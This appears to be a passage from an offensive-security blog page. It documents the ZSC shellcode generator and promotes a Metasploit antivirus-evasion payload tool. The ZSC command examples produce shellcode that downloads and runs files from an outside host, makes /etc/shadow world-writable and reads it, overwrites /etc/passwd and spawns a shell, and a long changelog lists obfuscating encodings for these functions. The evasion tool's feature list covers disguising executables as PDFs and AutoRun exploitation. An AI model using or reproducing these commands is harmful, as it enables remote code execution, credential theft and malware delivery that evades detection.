>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello2.txt','hello[space]world[space]!')" -o file.txt
>zsc -os linux_x86 -encode none -job "dir_create('/root/Desktop/mydirectory')" -o file.txt
>zsc -os linux_x86 -encode none -job "download('http://www.z3r0d4y.com/exploit.type','myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','./myfile.type')" -o file.txt
#multi command
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','chmod[space]777[space]myfile.type;sh[space]myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('script.type','D:\\myfile.type','./script.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('z3r0d4y.sh','/root/z3r0d4y.sh','sh[space]z3r0d4y.sh')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('ali.py','/root/Desktop/0day.py','chmod[space]+x[space]ali.py;[space]python[space]ali.py')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]-la')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]-la[space]/etc/shadow;chmod[space]777[space]/etc/shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/shadow;wget[space]file[space];chmod[space]777[space]file;./file')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('wget[space]file;sh[space]file')" -o file.txt
>zsc -os linux_x86 -encode none -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode none -job "write('/etc/passwd','user:pass')" -o file.txt
>zsc -os linux_x86 -encode none -job "exec('/bin/bash')" -o file.txt

Note: Don’t use a space ‘ ’ in the system() function; replace it with “[space]” and the software will detect it and put “ ” back for you in the shellcode.
Note: script_executor(), download_execute(), download(), dir_create() and file_create() use the Linux command line [wget, mkdir, echo], not the function. The system() function was added to the script; you can use it to do anything and generate any command-line shellcode.
Note: exec() doesn’t support any ARGV such as exec(‘/bin/bash -c ls’) or exec(‘/bin/bash’,‘-c’,‘ls’); you have to wait for the next version, where this feature will be available in system().
Note: you can also use a high value for the inc and dec times, like inc_100000, but your shellcode may get too big.
Note: each time you execute the chmod() [or any other] function with a random encode, you get random output and a different shellcode.
Note: your xor value could be anything; “xor_0x41414141” and “xor_0x45872f4d” are examples.

Wizard Switch

With -wizard switch you are able to generate shellcode without long ARGVs, software will ask you for information.

Note: While using the -wizard switch, if you press “Enter” without typing anything, the default value is assigned to the variable.
Note: Entering “list” shows the list of available values.

Available Features
  • add length calculator for output
  • add filename writer in gcc command line in output file
  • fixed bug when the encoding module is not available
  • fixed bug when the os module is not available
  • add “-wizard” switch
  • add installer (use the ‘zsc’ command in the terminal after installation)
  • add uninstaller
  • since this version, this software can only be run on Linux
  • change output to .c file and automated shellcode generating
  • add color output for terminal
  • add inc encoding chmod() [linux_x86]
  • add inc_timesyouwant chmod() [linux_x86]
  • add dec encoding chmod() [linux_x86]
  • add dec_timesyouwant chmod() [linux_x86]
  • add features table inside “features_table.html”
  • add -about to menu for developer names, etc.
  • fixed permission number calculation in chmod() [linux_x86]
  • software’s signature changes
  • fixed user-reported bug when executing on Linux (color function)
  • add xor_random encoding chmod() [linux_x86]
  • add xor_yourvalue encoding chmod() [linux_x86]
  • add add_random encoding chmod() [linux_x86]
  • add add_yourvalue encoding chmod() [linux_x86]
  • add sub_random encoding chmod() [linux_x86]
  • add sub_yourvalue encoding chmod() [linux_x86]
  • fixed shellcode encode type checking
  • [linux_x86 modules completed]
  • add script_executor() [linux - using command execution]
  • add download_execute() [linux_x86 - using command execution (wget)]
  • add download() [linux_x86 - using command execution (wget)]
  • add dir_create() [linux_x86 using command execution]
  • add file_create() [linux_x86 using command execution]
  • add encodes file for next version released
  • add system() [linux_x86 command execute]
  • fixed chmod filename %4 char length [linux_x86]
  • fixed exec filename %4 char length [linux_x86]
  • fixed write filename %4 length [linux_x86]
  • fixed write content %4 length [linux_x86]
  • fixed write length calculator [linux_x86]
  • fixed some other bugs in coding [core]
  • system() function added in script, you can use it to do anything and generate any command line shellcode.
  • add chmod() [linux_x86] -> chmod(‘/path/file’,‘perm_num’)
  • add write() [linux_x86] -> write(‘/path/file’,‘content’)
  • add exec() [linux_x86] -> exec(‘/path/file’)
  • add encode [none - all os]
  • add mix_all encoding in chmod() [linux_x86]
  • add xor_random encoding in system() [linux_x86]
  • add xor_yourvalue encoding in system() [linux_x86]
  • add add_random encoding in system() [linux_x86]
  • add add_yourvalue encoding in system() [linux_x86]
  • add sub_random encoding in system() [linux_x86]
  • add sub_yourvalue encoding in system() [linux_x86]
  • add inc encoding in system() [linux_x86]
  • add inc_timesyouwant encoding in system() [linux_x86]
  • add dec encoding in system() [linux_x86]
  • add dec_timesyouwant encoding in system() [linux_x86]
  • add mix_all encoding in system() [linux_x86]
  • add xor_random encoding in file_create() [linux_x86]
  • add xor_yourvalue encoding in file_create() [linux_x86]
  • add add_random encoding in file_create() [linux_x86]
  • add add_yourvalue encoding in file_create() [linux_x86]
  • add sub_random encoding in file_create() [linux_x86]
  • add sub_yourvalue encoding in file_create() [linux_x86]
  • add inc encoding in file_create() [linux_x86]
  • add inc_timesyouwant encoding in file_create() [linux_x86]
  • add dec encoding in file_create() [linux_x86]
  • add dec_timesyouwant encoding in file_create() [linux_x86]
  • add mix_all encoding in file_create() [linux_x86]
  • add xor_random encoding in dir_create() [linux_x86]
  • add xor_yourvalue encoding in dir_create() [linux_x86]
  • add add_random encoding in dir_create() [linux_x86]
  • add add_yourvalue encoding in dir_create() [linux_x86]
  • add sub_random encoding in dir_create() [linux_x86]
  • add sub_yourvalue encoding in dir_create() [linux_x86]
  • add inc encoding in dir_create() [linux_x86]
  • add inc_timesyouwant encoding in dir_create() [linux_x86]
  • add dec encoding in dir_create() [linux_x86]
  • add dec_timesyouwant encoding in dir_create() [linux_x86]
  • add mix_all encoding in dir_create() [linux_x86]
  • add xor_random encoding in download() [linux_x86]
  • add xor_yourvalue encoding in download() [linux_x86]
  • add add_random encoding in download() [linux_x86]
  • add add_yourvalue encoding in download() [linux_x86]
  • add sub_random encoding in download() [linux_x86]
  • add sub_yourvalue encoding in download() [linux_x86]
  • add inc encoding in download() [linux_x86]
  • add inc_timesyouwant encoding in download() [linux_x86]
  • add dec encoding in download() [linux_x86]
  • add dec_timesyouwant encoding in download() [linux_x86]
  • add mix_all encoding in download() [linux_x86]
  • add xor_random encoding in download_execute() [linux_x86]
  • add xor_yourvalue encoding in download_execute() [linux_x86]
  • add add_random encoding in download_execute() [linux_x86]
  • add add_yourvalue encoding in download_execute() [linux_x86]
  • add sub_random encoding in download_execute() [linux_x86]
  • add sub_yourvalue encoding in download_execute() [linux_x86]
  • add inc encoding in download_execute() [linux_x86]
  • add inc_timesyouwant encoding in download_execute() [linux_x86]
  • add dec encoding in download_execute() [linux_x86]
  • add dec_timesyouwant encoding in download_execute() [linux_x86]
  • add mix_all encoding in download_execute() [linux_x86]
  • add xor_random encoding in system() [linux_x86]
  • add xor_yourvalue encoding in system() [linux_x86]
  • add add_random encoding in system() [linux_x86]
  • add add_yourvalue encoding in system() [linux_x86]
  • add sub_random encoding in system() [linux_x86]
  • add sub_yourvalue encoding in system() [linux_x86]
  • add inc encoding in system() [linux_x86]
  • add inc_timesyouwant encoding in system() [linux_x86]
  • add dec encoding in system() [linux_x86]
  • add dec_timesyouwant encoding in system() [linux_x86]
  • add mix_all encoding in system() [linux_x86]
  • add xor_random encoding in script_executor() [linux_x86]
  • add xor_yourvalue encoding in script_executor() [linux_x86]
  • add add_random encoding in script_executor() [linux_x86]
  • add add_yourvalue encoding in script_executor() [linux_x86]
  • add sub_random encoding in script_executor() [linux_x86]
  • add sub_yourvalue encoding in script_executor() [linux_x86]
  • add inc encoding in script_executor() [linux_x86]
  • add inc_timesyouwant encoding in script_executor() [linux_x86]
  • add dec encoding in script_executor() [linux_x86]
  • add dec_timesyouwant encoding in script_executor() [linux_x86]
  • add mix_all encoding in script_executor() [linux_x86]
  • add add_random encoding in write() [linux_x86]
  • add xor_random encoding in write() [linux_x86]
  • add sub_random encoding in write() [linux_x86]
  • add xor_random encoding in exec() [linux_x86]
  • add sub_random encoding in exec() [linux_x86]
  • add add_random encoding in exec() [linux_x86]
  • fixed bug in system() when len(command) is less than 5
  • fixed bug in encode module add_random chmod() [linux_x86] 

Metasploit AV Evasion - Metasploit payload generator that avoids most Anti-Virus products

Metasploit payload generator that avoids most Anti-Virus products.

Installing
git clone https://github.com/nccgroup/metasploitavevasion.git
chmod +x the avoid.sh file before use.

How To Use
./avoid.sh
Then follow the on screen prompts.

Features
  • Easily generate a Metasploit executable payload to bypass Anti-Virus detection
  • Local or remote listener generation
  • Disguises the executable file with a PDF icon
  • Executable opens minimised on the victim's computer
  • Automatically creates AutoRun files for CDROM exploitation

Established in 2015. Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.
Copyright © OffSec Blog | Powered by OffensiveSec
Design by OffSec | Built for the security community